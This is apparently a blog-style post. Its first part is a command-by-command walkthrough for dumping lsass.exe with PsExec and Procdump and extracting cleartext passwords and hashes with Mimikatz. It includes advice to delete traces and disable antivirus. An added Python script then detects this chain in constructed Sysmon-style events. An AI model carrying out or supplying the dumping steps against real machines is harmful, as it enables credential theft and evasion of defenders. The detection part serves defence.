Surprisingly, Microsoft supplies the tools that allow you to dump lsass.exe, and you can then run Mimikatz on the dump file to get a shit load of goodies: tokens, plaintext cached domain credentials, etc.
Copy both the PsExec and Procdump zip files to the computer you want to dump lsass from, and extract the contents of the zip files.
Open a command prompt and move to the folder where you extracted the PsExec zip file.
Run the command below to escalate from local admin to NT AUTHORITY\SYSTEM.
PSEXEC -i -s -d CMD
You can check that you are now NT AUTHORITY\SYSTEM by running whoami; you should get output like this.
So, as NT AUTHORITY\SYSTEM, navigate to where you extracted Procdump and run the command below.
procdump -ma lsass.exe lsassdump
Copy the lsassdump.dmp found in your Procdump directory back to your PC, ready to run Mimikatz on it.
If you're trying to be a little covert, delete any directories and zip files created in the previous steps.
Download Mimikatz from the author's site.
Extract the contents of the zip file (be careful: antivirus will pick this up as a virus, so disable it if needed).
Type “sekurlsa::minidump (location of lsassdump.dmp)”
Lastly, type “sekurlsa::logonpasswords”
You can get Mimikatz to write a log file of everything it finds by typing “log” in the Mimikatz console first.
And that is it: Mimikatz will run through the dump file and within a second or so you will get all the tasty clear-text passwords and hashes you required.
Have not been able to run Mimikatz from a Windows 10 PC; will investigate…
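From the defender's side, the steps above leave a recognisable trail: a PsExec launch with -s, a procdump command line naming lsass, a process opening lsass.exe with full access rights, and a .dmp file being written. The Python below is an added example, not part of the original post, that runs simple detection rules over constructed Sysmon-style records. The record format is a simplified key=value text form rather than real Sysmon XML; the event IDs (1 ProcessCreate, 10 ProcessAccess, 11 FileCreate), field names and the access-mask watchlist follow Sysmon conventions, while the allowlisted source-process paths and the sample events are assumptions made for the example.

```python
"""Detection rules for the lsass-dump chain: psexec -s -> procdump -ma lsass -> .dmp file.

Runs over constructed, Sysmon-style records in a simplified 'Key=Value|Key=Value'
text form (not real Sysmon XML). Field names mirror Sysmon's: EventID, Image,
CommandLine, SourceImage, TargetImage, GrantedAccess, TargetFilename.
"""
import re
from typing import Dict, Iterable, List, Optional

# Access masks commonly requested when a full memory dump of a process is taken
# (PROCESS_ALL_ACCESS and the VM_READ / QUERY_INFORMATION combinations).
# A watchlist for the example; tune it against your own baseline.
SUSPICIOUS_LSASS_ACCESS = {0x1FFFFF, 0x1F3FFF, 0x1F1FFF, 0x1010, 0x1038, 0x1410, 0x143A}

# Processes that legitimately open lsass with broad rights on a typical host.
# Constructed allowlist for the example; a real one comes from baselining.
LSASS_ACCESS_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\msmpeng.exe",  # hypothetical AV engine path
}


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed 'Key=Value|Key=Value' record into a dict."""
    fields: Dict[str, str] = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def detect(event: Dict[str, str]) -> Optional[str]:
    """Return an alert name if the event matches one of the chain's steps, else None."""
    eid = event.get("EventID")
    img = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    if eid == "1":
        # Step 1: PsExec starting a SYSTEM shell (-s). Matches psexec.exe / psexec64.exe.
        if re.search(r"\\psexec(64)?\.exe$", img) and re.search(r"(^|\s)-s(\s|$)", cmd):
            return "psexec_system_shell"
        # Step 2: procdump pointed at lsass by name. A renamed binary evades this rule,
        # which is why the Event ID 10 rule below matters.
        if "procdump" in img and "lsass" in cmd:
            return "procdump_lsass_cmdline"
    if eid == "10":
        # Logged from lsass's side, so it fires whatever the dumping tool is called.
        target = event.get("TargetImage", "").lower()
        source = event.get("SourceImage", "").lower()
        if target.endswith(r"\lsass.exe") and source not in LSASS_ACCESS_ALLOWLIST:
            try:
                granted = int(event.get("GrantedAccess", "0"), 16)  # e.g. "0x1FFFFF"
            except ValueError:
                granted = 0
            if granted in SUSPICIOUS_LSASS_ACCESS:
                return "lsass_memory_access"
    if eid == "11":
        # Step 3: the dump file landing on disk.
        fname = event.get("TargetFilename", "").lower()
        if fname.endswith(".dmp") and "lsass" in fname:
            return "lsass_dump_written"
    return None


def scan(lines: Iterable[str]) -> List[str]:
    """Return the alert names fired, in order, for a sequence of records."""
    return [hit for hit in (detect(parse_event(line)) for line in lines) if hit]


# Constructed sample records reproducing the walkthrough plus benign noise.
SAMPLE_EVENTS = [
    r"EventID=1|Image=C:\Windows\System32\svchost.exe|CommandLine=svchost.exe -k netsvcs",
    r"EventID=1|Image=C:\Tools\PsExec\PsExec64.exe|CommandLine=PSEXEC -i -s -d CMD",
    r"EventID=1|Image=C:\Tools\Procdump\procdump.exe|CommandLine=procdump -ma lsass.exe lsassdump",
    r"EventID=10|SourceImage=C:\Tools\Procdump\procdump.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1FFFFF",
    r"EventID=10|SourceImage=C:\Windows\System32\svchost.exe|TargetImage=C:\Windows\System32\lsass.exe|GrantedAccess=0x1FFFFF",
    r"EventID=10|SourceImage=C:\Tools\Procdump\procdump.exe|TargetImage=C:\Windows\System32\notepad.exe|GrantedAccess=0x1FFFFF",
    r"EventID=11|Image=C:\Tools\Procdump\procdump.exe|TargetFilename=C:\Tools\Procdump\lsassdump.dmp",
]

if __name__ == "__main__":
    for name in scan(SAMPLE_EVENTS):
        print(name)
```

The command-line rules are cheap but brittle: renaming procdump.exe defeats the second rule, while the Event ID 10 rule still fires because Sysmon records the access from lsass's side regardless of the opening process's name. The allowlist is the part that needs care in practice, since a broad one quietly hides exactly the access this rule exists to catch.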